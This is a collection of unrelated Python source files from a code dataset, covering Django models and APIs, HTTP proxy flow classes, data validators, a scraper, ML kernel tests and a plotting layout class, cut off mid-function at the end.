return x.replace(',', ' ').split()
return x or []
def namedtuple(name, args=None, optional=None):
args = coerce_to_list(args)
optional = coerce_to_list(optional)
x = collections.namedtuple(name, args + optional)
if hasattr(x.__new__, 'func_defaults'): # python 2
x.__new__.func_defaults = tuple([None] * len(optional))
elif hasattr(x.__new__, '__defaults__'): # python 3
x.__new__.__defaults__ = tuple([None] * len(optional))
else:
raise Exception('???')
return x
def optional(fn):
def opt(x):
if x is not None:
return fn(x)
return opt
| StarcoderdataPython |
3385754 | from django.db import models
from datetime import datetime
# Create your models here.
class Container(models.Model):
number = models.CharField(max_length=11)
carrier = models.CharField(max_length=128)
status = models.CharField(max_length=200)
date = models.DateTimeField()
location = models.CharField(max_length=300)
last_import = models.DateTimeField(default=datetime.now)
| StarcoderdataPython |
154524 | from __future__ import absolute_import
import copy
import netlib.tcp
from .. import stateobject, utils, version
from ..proxy.primitives import AddressPriority
from ..proxy.connection import ClientConnection, ServerConnection
KILL = 0 # const for killed requests
class BackreferenceMixin(object):
"""
If an attribute from the _backrefattr tuple is set,
this mixin sets a reference back on the attribute object.
Example:
e = Error()
f = Flow()
f.error = e
assert f is e.flow
"""
_backrefattr = tuple()
def __setattr__(self, key, value):
super(BackreferenceMixin, self).__setattr__(key, value)
if key in self._backrefattr and value is not None:
setattr(value, self._backrefname, self)
class Error(stateobject.SimpleStateObject):
"""
An Error.
This is distinct from an HTTP error response (say, a code 500), which
is represented by a normal Response object. This class is responsible
for indicating errors that fall outside of normal HTTP communications,
like interrupted connections, timeouts, protocol errors.
Exposes the following attributes:
flow: Flow object
msg: Message describing the error
timestamp: Seconds since the epoch
"""
def __init__(self, msg, timestamp=None):
"""
@type msg: str
@type timestamp: float
"""
self.flow = None # will usually be set by the flow backref mixin
self.msg = msg
self.timestamp = timestamp or utils.timestamp()
_stateobject_attributes = dict(
msg=str,
timestamp=float
)
def __str__(self):
return self.msg
@classmethod
def _from_state(cls, state):
f = cls(None) # the default implementation assumes an empty constructor. Override accordingly.
f._load_state(state)
return f
def copy(self):
c = copy.copy(self)
return c
class Flow(stateobject.SimpleStateObject, BackreferenceMixin):
def __init__(self, conntype, client_conn, server_conn):
self.conntype = conntype
self.client_conn = client_conn
"""@type: ClientConnection"""
self.server_conn = server_conn
"""@type: ServerConnection"""
self.error = None
"""@type: Error"""
self._backup = None
_backrefattr = ("error",)
_backrefname = "flow"
_stateobject_attributes = dict(
error=Error,
client_conn=ClientConnection,
server_conn=ServerConnection,
conntype=str
)
def _get_state(self):
d = super(Flow, self)._get_state()
d.update(version=version.IVERSION)
return d
def __eq__(self, other):
return self is other
def copy(self):
f = copy.copy(self)
f.client_conn = self.client_conn.copy()
f.server_conn = self.server_conn.copy()
if self.error:
f.error = self.error.copy()
return f
def modified(self):
"""
Has this Flow been modified?
"""
if self._backup:
return self._backup != self._get_state()
else:
return False
def backup(self, force=False):
"""
Save a backup of this Flow, which can be reverted to using a
call to .revert().
"""
if not self._backup:
self._backup = self._get_state()
def revert(self):
"""
Revert to the last backed up state.
"""
if self._backup:
self._load_state(self._backup)
self._backup = None
class ProtocolHandler(object):
def __init__(self, c):
self.c = c
"""@type: libmproxy.proxy.ConnectionHandler"""
def handle_messages(self):
"""
This method gets called if a client connection has been made. Depending on the proxy settings,
a server connection might already exist as well.
"""
raise NotImplementedError # pragma: nocover
def handle_error(self, error):
"""
This method gets called should there be an uncaught exception during the connection.
This might happen outside of handle_messages, e.g. if the initial SSL handshake fails in transparent mode.
"""
raise error # pragma: nocover
class TemporaryServerChangeMixin(object):
"""
This mixin allows safe modification of the target server,
without any need to expose the ConnectionHandler to the Flow.
"""
def change_server(self, address, ssl):
address = netlib.tcp.Address.wrap(address)
if address == self.c.server_conn.address():
return
priority = AddressPriority.MANUALLY_CHANGED
self.c.log("Temporarily change server connection: %s:%s -> %s:%s" % (
self.c.server_conn.address.host,
self.c.server_conn.address.port,
address.host,
address.port
), "debug")
if not hasattr(self, "_backup_server_conn"):
self._backup_server_conn = self.c.server_conn
self.c.server_conn = None
else: # This is at least the second temporary change. We can kill the current connection.
self.c.del_server_connection()
self.c.set_server_address(address, priority)
if ssl:
self.c.establish_ssl(server=True)
def restore_server(self):
if not hasattr(self, "_backup_server_conn"):
return
self.c.log("Restore original server connection: %s:%s -> %s:%s" % (
self.c.server_conn.address.host,
self.c.server_conn.address.port,
self._backup_server_conn.address.host,
self._backup_server_conn.address.port
), "debug")
self.c.del_server_connection()
self.c.server_conn = self._backup_server_conn
del self._backup_server_conn | StarcoderdataPython |
1618253 | <reponame>nice-shot/FacebookFilter
from django.db import models
from django.contrib.auth import models as auth_models
from jsonfield import JSONCharField
# Create your models here.
class FacebookPage(models.Model):
"""
Represents a Facebook page, group or any other object that we can subscribe
to
"""
id = models.CharField(max_length=100, primary_key=True,
help_text="Page's facebook id")
name = models.CharField(max_length=300, blank=True,
help_text="Page or group's name")
class Filter(models.Model):
"""
Filter settings for a specific user
"""
user = models.ForeignKey(auth_models.User, related_name="filters")
name = models.CharField(max_length=200,
help_text="Name to identify the filter by")
filter_str = JSONCharField(max_length=1000)
# FacebookPage does not have back relation to Filter
pages = models.ManyToManyField(FacebookPage, related_name="+",
help_text="Pages to follow")
class Post(models.Model):
"""
Facebook post that we found relevant
"""
id = models.CharField(max_length=100, primary_key=True,
help_text="Facebook post id")
page = models.ForeignKey(FacebookPage, help_text="Page this post is from")
message = models.TextField()
user = models.CharField(max_length=300,
help_text="Post creator's user name")
created_time = models.DateTimeField()
updated_time = models.DateTimeField()
filters = models.ManyToManyField(Filter, through="FilteredPost",
related_name="posts")
class FilteredPost(models.Model):
"""
Relation between filter and post. This includes the user's comment and
whether the post is interesting
"""
filter = models.ForeignKey(Filter)
post = models.ForeignKey(Post)
found_time = models.DateTimeField(auto_now_add=True)
keep = models.NullBooleanField()
comment = models.TextField(blank=True)
| StarcoderdataPython |
178899 | <filename>accounts/api.py<gh_stars>0
from rest_framework import generics, permissions
from rest_framework.response import Response
from knox.models import AuthToken
from .serializers import UserSerializer, RegisterSerializer,LoginSerializer
# Register API
class RegisterAPI(generics.GenericAPIView):
serializer_class = RegisterSerializer
def post(self,request, *arg, **kwargs):
datos = {
"username": request.data.get("username"),
"password": request.data.get("password"),
"email": request.data.get("email")
}
serializer = self.get_serializer(data=datos)
serializer.is_valid(raise_exception=True)
user = serializer.save()
return Response({
"user": UserSerializer(user, context=self.get_serializer_context()).data,
"token": AuthToken.objects.create(user) [1]
})
# Login API
class LoginAPI(generics.GenericAPIView):
serializer_class = LoginSerializer
def post (self , request, *arg, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
user = serializer.validated_data
return Response({
"user": UserSerializer(user, context=self.get_serializer_context()).data,
"token": AuthToken.objects.create(user) [1]
})
# Get user API
class UserAPI(generics.RetrieveAPIView):
permission_classes=[
permissions.IsAuthenticated,
]
serializer_class= UserSerializer
def get_object(self):
return self.request.user
| StarcoderdataPython |
1753375 | <gh_stars>1-10
x=input("ENTER 1st NUMBER")
y=input("ENTER 2nd NUMBER")
x=int(x)
y=int(y)
z=x+y
print(z)
# another way
result = eval(input('enter en expr')) # enter expression ---> 2 + 6 - 1
print(result)
| StarcoderdataPython |
1742890 | import re
import unicodedata
from datetime import date
from decimal import Decimal
from django.core.exceptions import ValidationError
from django.utils.timezone import now
from django.utils.translation import ugettext as _
EMAIL_VALIDATOR = re.compile(r'[a-zA-Z0-9\._-]+@[a-zA-Z0-9\._-]+\.[a-zA-Z]+')
PHONE_FILTER = re.compile(r'[^+0-9]')
PHONE_VALIDATOR = re.compile(r'\+?\d{6,}')
PASSPORT_FILTER = re.compile(r'[^-A-Z0-9]')
STRIP_NON_NUMBERS = re.compile(r'[^0-9]')
STRIP_NON_ALPHANUMERIC = re.compile(r'[^0-9A-Za-z]')
STRIP_WHITESPACE = re.compile(r'\s+')
IBAN_FILTER = re.compile(r'[^A-Z0-9]')
def phone_filter(v: str) -> str:
return PHONE_FILTER.sub('', str(v)) if v else ''
def email_filter(v: str) -> str:
return str(v).lower().strip() if v else ''
def email_validator(v: str) -> str:
v = email_filter(v)
if not v or not EMAIL_VALIDATOR.fullmatch(v):
v_str = _('Missing value') if not v else str(v)
raise ValidationError(_('Invalid email') + ': {}'.format(v_str), code='invalid_email')
def phone_validator(v: str):
v = phone_filter(v)
if not v or not PHONE_VALIDATOR.fullmatch(v):
v_str = _('Missing value') if v is None else str(v)
raise ValidationError(_('Invalid phone number') + ': {}'.format(v_str), code='invalid_phone')
def passport_filter(v: str) -> str:
return PASSPORT_FILTER.sub('', str(v).upper()) if v else ''
def passport_validator(v: str):
v = passport_filter(v)
if not v or len(v) < 5:
v_str = _('Missing value') if v is None else str(v)
raise ValidationError(_('Invalid passport number') + ': {}'.format(v_str), code='invalid_passport')
def ascii_filter(v: str) -> str:
"""
Replaces Unicode accent characters with plain ASCII.
For example remove_accents('HELÉN') == 'HELEN'.
:param v: str
:return: str
"""
return unicodedata.normalize('NFKD', v).encode('ASCII', 'ignore').decode()
def iban_filter(v: str) -> str:
return IBAN_FILTER.sub('', str(v).upper()) if v else ''
def iban_filter_readable(acct) -> str:
acct = iban_filter(acct)
if acct:
i = 0
j = 4
out = ''
nlen = len(acct)
while i < nlen:
if out:
out += ' '
out += acct[i:j]
i = j
j += 4
return out
return acct
def iban_validator(v: str):
v = iban_filter(v)
if not v:
raise ValidationError(_('Invalid IBAN account number') + ': {}'.format(_('Missing value')), code='invalid_iban')
digits = '0123456789'
num = ''
for ch in v[4:] + v[0:4]:
if ch not in digits:
ch = str(ord(ch) - ord('A') + 10)
num += ch
x = Decimal(num) % Decimal(97)
if x != Decimal(1):
raise ValidationError(_('Invalid IBAN account number') + ': {}'.format(v), code='invalid_iban')
def validate_country_iban(v: str, country: str, length: int):
v = iban_filter(v)
if len(v) != length:
raise ValidationError(_('Invalid IBAN account number') + ' ({}.1): {}'.format(country, v), code='invalid_iban')
if v[0:2] != country:
raise ValidationError(_('Invalid IBAN account number') + ' ({}.2): {}'.format(country, v), code='invalid_iban')
digits = '0123456789'
num = ''
for ch in v[4:] + v[0:4]:
if ch not in digits:
ch = str(ord(ch) - ord('A') + 10)
num += ch
x = Decimal(num) % Decimal(97)
if x != Decimal(1):
raise ValidationError(_('Invalid IBAN account number') + ' ({}.3): {}'.format(country, v), code='invalid_iban')
def iban_bank_info(v: str) -> (str, str):
"""
Returns BIC code and bank name from IBAN number.
:param v: IBAN account number
:return: (BIC code, bank name) or ('', '') if not found / unsupported country
"""
v = iban_filter(v)
if v[:2] == 'FI':
return fi_iban_bank_info(v)
elif v[:2] == 'BE':
return be_iban_bank_info(v)
else:
return '', ''
def iban_bic(v: str) -> str:
"""
Returns BIC code from IBAN number.
:param v: IBAN account number
:return: BIC code or '' if not found
"""
info = iban_bank_info(v)
return info[0] if info else ''
def calculate_age(born: date, today: date or None=None) -> int:
if not today:
today = now().date()
return today.year - born.year - ((today.month, today.day) < (born.month, born.day))
# -----------------------------------------------
# Finland
# -----------------------------------------------
FI_SSN_FILTER = re.compile(r'[^-A-Z0-9]')
FI_SSN_VALIDATOR = re.compile(r'^\d{6}[+-A]\d{3}[\d\w]$')
FI_COMPANY_REG_ID_FILTER = re.compile(r'[^0-9]')
def fi_payment_reference_number(num: str):
"""
Appends Finland reference number checksum to existing number.
:param num: At least 3 digits
:return: Number plus checksum
"""
assert isinstance(num, str)
num = STRIP_WHITESPACE.sub('', num)
num = re.sub(r'^0+', '', num)
assert len(num) >= 3
weights = [7, 3, 1]
weighed_sum = 0
numlen = len(num)
for j in range(numlen):
weighed_sum += int(num[numlen - 1 - j]) * weights[j % 3]
return num + str((10 - (weighed_sum % 10)) % 10)
def fi_payment_reference_validator(v: str):
v = STRIP_WHITESPACE.sub('', v)
if fi_payment_reference_number(v[:-1]) != v:
raise ValidationError(_('Invalid payment reference: {}').format(v))
def iso_payment_reference_validator(v: str):
"""
Validates ISO reference number checksum.
:param v: Reference number
"""
num = ''
v = STRIP_WHITESPACE.sub('', v)
for ch in v[4:] + v[0:4]:
x = ord(ch)
if ord('0') <= x <= ord('9'):
num += ch
else:
x -= 55
if x < 10 or x > 35:
raise ValidationError(_('Invalid payment reference: {}').format(v))
num += str(x)
res = Decimal(num) % Decimal('97')
if res != Decimal('1'):
raise ValidationError(_('Invalid payment reference: {}').format(v))
def fi_iban_validator(v: str):
validate_country_iban(v, 'FI', 18)
def fi_iban_bank_info(v: str) -> (str, str):
"""
Returns BIC code and bank name from FI IBAN number.
:param v: IBAN account number
:return: (BIC code, bank name) or ('', '') if not found
"""
from jutil.bank_const_fi import FI_BIC_BY_ACCOUNT_NUMBER, FI_BANK_NAME_BY_BIC
v = iban_filter(v)
bic = FI_BIC_BY_ACCOUNT_NUMBER.get(v[4:7], None)
return (bic, FI_BANK_NAME_BY_BIC[bic]) if bic is not None else ('', '')
def be_iban_bank_info(v: str) -> (str, str):
"""
Returns BIC code and bank name from BE IBAN number.
:param v: IBAN account number
:return: (BIC code, bank name) or ('', '') if not found
"""
from jutil.bank_const_be import BE_BIC_BY_ACCOUNT_NUMBER, BE_BANK_NAME_BY_BIC
v = iban_filter(v)
bic = BE_BIC_BY_ACCOUNT_NUMBER.get(v[4:7], None)
bankname= BE_BANK_NAME_BY_BIC.get(bic,'')
return (bic, bankname) if bic is not None else ('', '')
def fi_ssn_filter(v: str) -> str:
return FI_SSN_FILTER.sub('', v.upper())
def fi_company_reg_id_filter(v: str) -> str:
v = FI_COMPANY_REG_ID_FILTER.sub('', v)
return v[:-1] + '-' + v[-1:] if len(v) >= 2 else ''
def fi_company_reg_id_validator(v0: str) -> str:
v = fi_company_reg_id_filter(v0)
prefix = v[:2]
if v[-2:-1] != '-' and prefix != 'FI':
raise ValidationError(_('Invalid company registration ID')+' (FI.1): {}'.format(v0), code='invalid_company_reg_id')
v = v.replace('-', '', 1)
if len(v) != 8:
raise ValidationError(_('Invalid company registration ID')+' (FI.2): {}'.format(v0), code='invalid_company_reg_id')
multipliers = (7, 9, 10, 5, 8, 4, 2)
x = 0
for i, m in enumerate(multipliers):
x += int(v[i]) * m
quotient, remainder = divmod(x, 11)
if remainder == 1:
raise ValidationError(_('Invalid company registration ID')+' (FI.3): {}'.format(v0), code='invalid_company_reg_id')
if remainder >= 2:
check_digit = str(11 - remainder)
if check_digit != v[-1:]:
raise ValidationError(_('Invalid company registration ID')+' (FI.4): {}'.format(v0), code='invalid_company_reg_id')
def fi_ssn_validator(v: str):
v = fi_ssn_filter(v)
if not FI_SSN_VALIDATOR.fullmatch(v):
raise ValidationError(_('Invalid personal identification number')+' (FI.1): {}'.format(v), code='invalid_ssn')
d = int(Decimal(v[0:6] + v[7:10]) % Decimal(31))
digits = {
10: 'A', 11: 'B', 12: 'C', 13: 'D', 14: 'E', 15: 'F', 16: 'H',
17: 'J', 18: 'K', 19: 'L', 20: 'M', 21: 'N', 22: 'P', 23: 'R',
24: 'S', 25: 'T', 26: 'U', 27: 'V', 28: 'W', 29: 'X', 30: 'Y',
}
ch = str(d)
if d in digits:
ch = digits[d]
if ch != v[-1:]:
raise ValidationError(_('Invalid personal identification number')+' (FI.2): {}'.format(v), code='invalid_ssn')
def fi_ssn_birthday(v: str) -> date:
v = fi_ssn_filter(v)
fi_ssn_validator(v)
sep = v[6] # 231298-965X
year = int(v[4:6])
month = int(v[2:4])
day = int(v[0:2])
if sep == '+': # 1800
year += 1800
elif sep == '-':
year += 1900
elif sep == 'A':
year += 2000
return date(year, month, day)
def fi_ssn_age(ssn: str, today: date or None=None) -> int:
return calculate_age(fi_ssn_birthday(ssn), today)
# -----------------------------------------------
# Sweden
# -----------------------------------------------
SE_SSN_FILTER = re.compile(r'[^-0-9]')
SE_SSN_VALIDATOR = re.compile(r'^\d{6}[-]\d{3}[\d]$')
def se_iban_validator(v: str):
validate_country_iban(v, 'SE', 24)
def se_ssn_filter(v: str) -> str:
return SE_SSN_FILTER.sub('', v.upper())
def se_ssn_validator(v: str):
v = se_ssn_filter(v)
if not SE_SSN_VALIDATOR.fullmatch(v):
raise ValidationError(_('Invalid personal identification number')+' (SE.1): {}'.format(v), code='invalid_ssn')
v = STRIP_NON_NUMBERS.sub('', v)
dsum = 0
for i in range(9):
x = int(v[i])
if i & 1 == 0:
x += x
# print('summing', v[i], 'as', x)
xsum = x % 10 + int(x/10) % 10
# print(v[i], 'xsum', xsum)
dsum += xsum
# print('sum', dsum)
rem = dsum % 10
# print('rem', rem)
checksum = 10 - rem
if checksum == 10:
checksum = 0
# print('checksum', checksum)
if int(v[-1:]) != checksum:
raise ValidationError(_('Invalid personal identification number')+' (SE.2): {}'.format(v), code='invalid_ssn')
def se_clearing_code_bank_info(account_number: str) -> (str, int):
"""
Returns Sweden bank info by clearning code.
:param account_number: 4-digit clearing code or account number
:return: (Bank name, account digit count) or ('', None) if not found
"""
from jutil.bank_const_se import SE_BANK_CLEARING_LIST
clearing = account_number[:4]
for name, begin, end, acc_digits in SE_BANK_CLEARING_LIST:
if begin <= clearing <= end:
return name, acc_digits
return '', None
| StarcoderdataPython |
95254 | import numpy as np
import pandas as pd
import datetime as dt
import math
import seaborn as sns
import matplotlib.pyplot as plt
import glob | StarcoderdataPython |
79907 | from collections import namedtuple
import jax.numpy as jnp
import pytest
from numpy.testing import assert_allclose
from numpyro.infer.einstein.kernels import (
RBFKernel,
RandomFeatureKernel,
GraphicalKernel,
IMQKernel,
LinearKernel,
MixtureKernel,
HessianPrecondMatrix,
PrecondMatrixKernel
)
T = namedtuple('TestSteinKernel', ['kernel', 'particle_info', 'loss_fn', 'kval'])
PARTICLES_2D = jnp.array([[1., 2.], [-10., 10.], [0., 0.], [2., -1]])
TPARTICLES_2D = (jnp.array([1., 2.]), jnp.array([10., 5.])) # transformed particles
TEST_CASES = [
T(RBFKernel,
lambda d: {},
lambda x: x,
{'norm': 3.8147664e-06,
'vector': jnp.array([0., 0.2500005]),
'matrix': jnp.array([[3.8147664e-06, 0.],
[0., 3.8147664e-06]])}
),
T(RandomFeatureKernel,
lambda d: {},
lambda x: x,
{'norm': -4.566867}),
T(IMQKernel,
lambda d: {},
lambda x: x,
{'norm': .104828484,
'vector': jnp.array([0.11043153, 0.31622776])}
),
T(LinearKernel,
lambda d: {},
lambda x: x,
{'norm': 21.}
),
T(lambda mode: MixtureKernel(mode=mode, ws=jnp.array([.2, .8]), kernel_fns=[RBFKernel(mode), RBFKernel(mode)]),
lambda d: {},
lambda x: x,
{'matrix': jnp.array([[3.8147664e-06, 0.],
[0., 3.8147664e-06]])}
),
T(lambda mode: GraphicalKernel(mode=mode, local_kernel_fns={'p1': RBFKernel('norm')}),
lambda d: {'p1': (0, d)},
lambda x: x,
{'matrix': jnp.array([[3.8147664e-06, 0.],
[0., 3.8147664e-06]])}
),
T(lambda mode: PrecondMatrixKernel(HessianPrecondMatrix(), RBFKernel(mode='matrix')),
lambda d: {},
lambda x: x[0] ** 4 - x[1] ** 3 / 2,
{'matrix': jnp.array([[5.608312e-09, 0.],
[0., 9.347186e-05]])}
)
]
PARTICLES = [(PARTICLES_2D, TPARTICLES_2D)]
TEST_IDS = [t[0].__class__.__name__ for t in TEST_CASES]
@pytest.mark.parametrize('kernel, particle_info, loss_fn, kval', TEST_CASES, ids=TEST_IDS)
@pytest.mark.parametrize('particles, tparticles', PARTICLES)
@pytest.mark.parametrize('mode', ['norm', 'vector', 'matrix'])
def test_kernel_forward(kernel, particles, particle_info, loss_fn, tparticles, mode, kval):
if mode not in kval:
return
d, = tparticles[0].shape
kernel_fn = kernel(mode=mode).compute(particles, particle_info(d), loss_fn)
value = kernel_fn(*tparticles)
assert_allclose(value, kval[mode])
| StarcoderdataPython |
71397 | <reponame>gopal131072/WormScraper
import bs4 as bs
import urllib.request
import sys
import os.path
# Reads the table of contents to try and generate a sitemap for the serial.
# I would use the actual sitemap but this is easier since the sitemap is in reverse chronological
# order whereas this is in the actual chronological order and is formatted better.
source = urllib.request.urlopen('https://parahumans.wordpress.com/table-of-contents/').read()
# Creates required object.
soup = bs.BeautifulSoup(source,'lxml')
# Opens a text file and writes all required URL's into it.
# If the sitemap already exists, the script simply exits without an error.
if(os.path.isfile("worm-sitemap.txt")):
print("Sitemap already exists, either from a previous scrape, or a custom sitemap.")
print("Not generating sitemap.")
sys.exit(0)
else:
file = open("worm-sitemap.txt","w")
print("File opened\n")
# Finds all anchor tags and gets the links they point to.
for url in soup.find_all('a'):
# We do not need any URL's after this one, since this is the end of the serial.
current = url.get('href')
# The final chapter's URL. We do not need any URL's after we reach this one.
lastURL = "parahumans.wordpress.com/2013/11/19/interlude-end/"
if(current==lastURL):
file.write(lastURL)
print("All done! URL file generated\n")
break
# The URL's vary a lot with title so I had to get creative on how to get only those we needed. Not the best way but it works.
Keywords = ['2012','2013','category']
if any(keys in current for keys in Keywords):
requiredURL = url.get('href')
requiredURL = requiredURL.replace("½","½")
file.write(requiredURL + "\n")
print("Getting link " + url.get('href') + "\n")
file.close()
| StarcoderdataPython |
75355 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""API class for dense (approximate) kernel mappers.
See ./random_fourier_features.py for a concrete instantiation of this class.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import six
class InvalidShapeError(Exception):
"""Exception thrown when a tensor's shape deviates from an expected shape."""
@six.add_metaclass(abc.ABCMeta)
class DenseKernelMapper(object):
"""Abstract class for a kernel mapper that maps dense inputs to dense outputs.
This class is abstract. Users should not create instances of this class.
"""
@abc.abstractmethod
def map(self, input_tensor):
"""Main Dense-Tensor-In-Dense-Tensor-Out (DTIDTO) map method.
Should be implemented by subclasses.
Args:
input_tensor: The dense input tensor to be mapped using the (approximate)
kernel mapper.
"""
raise NotImplementedError('map is not implemented for {}.'.format(self))
@abc.abstractproperty
def name(self):
"""Returns the name of the kernel mapper."""
pass
@abc.abstractproperty
def output_dim(self):
"""Returns the output dimension of the mapping."""
pass
| StarcoderdataPython |
3388218 | import luigi
import luigi.contrib.hadoop
import luigi.contrib.hdfs
class InputFile(luigi.ExternalTask):
"""
A task wrapping the HDFS target
"""
input_file = luigi.Parameter()
def output(self):
"""
Return the target on HDFS
"""
return luigi.contrib.hdfs.HdfsTarget(self.input_file)
class WordCount(luigi.contrib.hadoop.JobTask):
"""
A task that uses Hadoop streaming to perform WordCount
"""
input_file = luigi.Parameter()
output_file = luigi.Parameter()
# Set the number of reduce tasks
n_reduce_tasks = 1
def requires(self):
"""
Read from the output of the InputFile task
"""
return InputFile(self.input_file)
def output(self):
"""
Write the output to HDFS
"""
return luigi.contrib.hdfs.HdfsTarget(self.output_file)
def mapper(self, line):
"""
Read each line and produce a word and 1
"""
for word in line.strip().split():
yield word, 1
def reducer(self, key, values):
"""
Read each word and produce the word and the sum of it's values
"""
yield key, sum(values)
if __name__ == '__main__':
luigi.run(main_task_cls=WordCount) | StarcoderdataPython |
1653202 | import re
import numpy as np
import warnings
import copy
from .utils import is_pos_int, is_non_neg_int, \
is_proportion, is_positive, is_non_negative, \
inherits
class layout:
def __init__(self,
ncol=None,
nrow=None,
byrow=None,
rel_widths=None,
rel_heights=None,
design=None
):
"""
layout class to store information about arangement of patches found
in `cow.patch`.
Arguments
---------
ncol : integer
Integer for the number of columns to arrange the the patches in.
The default is None (which avoids conflicts if a value for
`design` is provided). If ``ncol`` is None but ``nrow`` is not,
then ``ncol`` will default to the minimum number of columns to
make sure that all patches can be visualized.
nrow : integer
Integer for the number of rows to arrange the the patches in.
The default is None (which avoids conflicts if a value for
``design`` is provided). If ``nrow`` is None but ``ncol`` is not,
then ``nrow`` will default to the minimum number of rows to make
sure that all patches can be visualized.
byrow : boolean
If ``ncol`` and/or ``nrow`` is included, then this boolean
indicates if the patches should be ordered by row (default if
``byrow`` is None or when parameter is ``True``) or by column (if
``byrow`` was ``False``).
design : np.array (float based) or str
Specification of the location of each patch in the arrangement.
Can either be a float numpy array with integers between 0 and
the number of patches to arrange, or a text string that captures
similar ideas to the array approach but uses capital alphabetical
characters (A-Z) to indicate each figure. More information is in
Notes.
rel_widths : list, np vector or tuple
Numerical vector of relative columns widths. This not required,
the default would be ``np.ones(ncol)`` or
``np.ones(design.shape[0])``. Note that this is a relative sizing
and the values are only required to be non-negative, non-zero
values, for example ``[1,2]`` would would make the first column
twice as wide as the second column.
rel_heights : list or tuple
Numerical vector of relative row heights. This not required,
the default would be ``np.ones(nrow)`` or
``np.ones(design.shape[1])``. Note that this is a relative sizing
and the values are only required to be non-negative, non-zero
values, for example ``[1,2]`` would would make the first row twice
as tall as the second row.
Notes
-----
*Design*
The ``design`` parameter expects specific input.
1. If the ``design`` is input as a numpy array, we expect it to have
integers only (0 to # patches-1). It is allowed to have ``np.nan``
values if certain "squares" of the layout are not covered by others
(the covering is defined by the value ordering). Note that we won't
check for overlap and ``np.nan`` is not enforced if another patches'
relative (min-x,min-y) and (max-x, max-y) define a box over that
``np.nan``'s area.
An example of a design of the numpy array form could look like
>>> my_np_design = np.array([[1,1,2],
... [3,3,2],
... [3,3,np.nan]])
2. if the ``design`` parameter takes in a string, we expect it to have
a structure such that each line (pre ``\\\\n``) contains the same number
of characters, and these characters must come from the first
(number of patches) capital alphabetical characters or the ``\#`` or
``.`` sign to indicate an empty square. Similar arguments w.r.t.
overlap and the lack of real enforcement for empty squares applies
(as in 1.).
An example of a design of the string form could look like
>>> my_str_design = \"\"\"
... AAB
... CCB
... CC\#
... \"\"\"
or
>>> my_str_design = \"\"\"
... AAB
... CCB
... CC.
... \"\"\"
See the `Layout guide`_ for more detailed examples of functionality.
.. _Layout guide: https://benjaminleroy.github.io/cowpatch/guides/Layout.html
*Similarities to our `R` cousins:*
This layout function is similar to `patchwork\:\:plot_layout <https://patchwork.data-imaginist.com/reference/plot_layout.html>`_
(with a special node to ``design`` parameter) and helps perform similar
ideas to `gridExtra\:\:arrangeGrob <https://cran.r-project.org/web/packages/gridExtra/vignettes/arrangeGrob.html>`_'s
``layout_matrix`` parameter, and `cowplot\:\:plot_grid <https://wilkelab.org/cowplot/reference/plot_grid.html>`_'s
``rel_widths`` and ``rel_heights`` parameters.
Examples
--------
>>> # Necessary libraries for example
>>> import numpy as np
>>> import cowpatch as cow
>>> import plotnine as p9
>>> import plotnine.data as p9_data
>>> g0 = p9.ggplot(p9_data.mpg) +\\
... p9.geom_bar(p9.aes(x="hwy")) +\\
... p9.labs(title = 'Plot 0')
>>> g1 = p9.ggplot(p9_data.mpg) +\\
... p9.geom_point(p9.aes(x="hwy", y = "displ")) +\\
... p9.labs(title = 'Plot 1')
>>> g2 = p9.ggplot(p9_data.mpg) +\\
... p9.geom_point(p9.aes(x="hwy", y = "displ", color="class")) +\\
... p9.labs(title = 'Plot 2')
>>> g3 = p9.ggplot(p9_data.mpg[p9_data.mpg["class"].isin(["compact",
... "suv",
... "pickup"])]) +\\
... p9.geom_histogram(p9.aes(x="hwy"),bins=10) +\\
... p9.facet_wrap("class")
>>> # design matrix
>>> vis_obj = cow.patch(g1,g2,g3)
>>> vis_obj += cow.layout(design = np.array([[0,1],
... [2,2]]))
>>> vis_obj.show()
>>> # design string
>>> vis_obj2 = cow.patch(g1,g2,g3)
>>> vis_obj2 += cow.layout(design = \"\"\"
... AB
... CC
... \"\"\")
>>> vis_obj2.show()
>>> # nrow, ncol, byrow
>>> vis_obj3 = cow.patch(g0,g1,g2,g3)
>>> vis_obj3 += cow.layout(nrow=2, byrow=False)
>>> vis_obj3.show()
>>> # rel_widths/heights
>>> vis_obj = cow.patch(g1,g2,g3)
>>> vis_obj += cow.layout(design = np.array([[0,1],
... [2,2]]),
... rel_widths = np.array([1,2]))
>>> vis_obj.show()
See also
--------
area : object class that helps ``layout`` define where plots will go
in the arangement
patch : fundamental object class which is combined with ``layout`` to
defin the overall arangement of plots
"""
if design is not None:
if ncol is not None or nrow is not None:
warnings.warn("ncol and nrow are overridden"+\
" by the design parameter")
if isinstance(design, np.ndarray):
if len(design.shape) == 1:
warnings.warn("design matrix is 1d,"+\
" will be seen as a 1-row design")
nrow, ncol = 1, design.shape[0]
design = design.reshape((1,-1))
else:
nrow, ncol = design.shape
if isinstance(design, str):
# convert design to desirable structure matrix structure
design = self._design_string_to_mat(design)
nrow, ncol = design.shape
if ncol is None:
if rel_widths is not None:
if isinstance(rel_widths, np.ndarray):
ncol = rel_widths.shape[0]
if isinstance(rel_widths, list) or \
isinstance(rel_widths, tuple):
ncol = len(rel_widths)
rel_widths = np.array(rel_widths)
if nrow is None:
if rel_heights is not None:
if isinstance(rel_heights, np.ndarray):
nrow = rel_heights.shape[0]
if isinstance(rel_heights, list) or \
isinstance(rel_heights, tuple):
nrow = len(rel_heights)
rel_heights= np.array(rel_heights)
if rel_widths is None and rel_heights is None:
assert not (ncol is None and nrow is None), \
"need some parameters to not be none in design initialization"
if rel_widths is None and ncol is not None:
rel_widths = np.ones(ncol)
if rel_heights is None and nrow is not None:
rel_heights = np.ones(nrow)
if rel_heights is not None:
rel_heights = np.array(rel_heights)
if rel_widths is not None:
rel_widths = np.array(rel_widths)
# if design is None:
# if byrow is None or byrow:
# order_str = "C"
# else:
# order_str = "F"
# design = np.arange(ncol*nrow,dtype = int).reshape((nrow, ncol),
# order = order_str)
if design is not None:
byrow = None
# ncol/nrow and rel_widths/rel_heights correct alignment
